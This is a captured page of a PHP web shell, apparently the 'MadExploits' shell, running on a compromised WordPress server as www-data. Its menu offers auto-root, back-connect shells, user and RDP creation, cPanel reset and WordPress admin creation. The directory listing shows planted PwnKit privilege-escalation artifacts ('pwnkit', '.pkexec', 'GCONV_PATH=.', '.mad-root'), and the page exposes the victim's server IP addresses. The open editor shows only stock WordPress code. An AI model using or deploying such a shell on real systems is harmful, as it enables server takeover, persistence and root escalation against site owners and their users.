Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.12.163.14
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
ansomone-hgh.com /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwsrwx
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
wp-admin
[ DIR ]
drwxrwsrwx
wp-content
[ DIR ]
drwxrwsrwx
wp-includes
[ DIR ]
drwxrwsrwx
.htaccess
235
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
admin.php
5.22
KB
-rw-r--r--
favicon.ico
4.19
KB
-rw-r--r--
index.php
418
B
-rwxr-xr-x
license.txt
19.09
KB
-rwxr-xr-x
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.19
KB
-rwxr-xr-x
wp-activate.php
4.92
KB
-rwxr-xr-x
wp-blog-header.php
271
B
-rwxr-xr-x
wp-comments-post.php
1.34
KB
-rwxr-xr-x
wp-config-sample.php
2.7
KB
-rwxr-xr-x
wp-config.php
3.06
KB
-rw-r--r--
wp-cron.php
3.21
KB
-rwxr-xr-x
wp-links-opml.php
2.32
KB
-rwxr-xr-x
wp-load.php
3.24
KB
-rwxr-xr-x
wp-login.php
32.98
KB
-rwxr-xr-x
wp-mail.php
7.7
KB
-rwxr-xr-x
wp-settings.php
12.72
KB
-rwxr-xr-x
wp-signup.php
27.92
KB
-rwxr-xr-x
wp-trackback.php
3.94
KB
-rwxr-xr-x
xmlrpc.php
2.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-comments-post.php
<?php /** * Handles Comment Post to WordPress and prevents duplicate comment posting. * * @package WordPress */ if ( 'POST' != $_SERVER['REQUEST_METHOD'] ) { header('Allow: POST'); header('HTTP/1.1 405 Method Not Allowed'); header('Content-Type: text/plain'); exit; } /** Sets up the WordPress Environment. */ require( dirname(__FILE__) . '/wp-load.php' ); nocache_headers(); $comment = wp_handle_comment_submission( wp_unslash( $_POST ) ); if ( is_wp_error( $comment ) ) { $data = $comment->get_error_data(); if ( ! empty( $data ) ) { wp_die( $comment->get_error_message(), $data ); } else { exit; } } $user = wp_get_current_user(); /** * Perform other actions when comment cookies are set. * * @since 3.4.0 * * @param WP_Comment $comment Comment object. * @param WP_User $user User object. The user may not exist. */ do_action( 'set_comment_cookies', $comment, $user ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; /** * Filter the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;
Close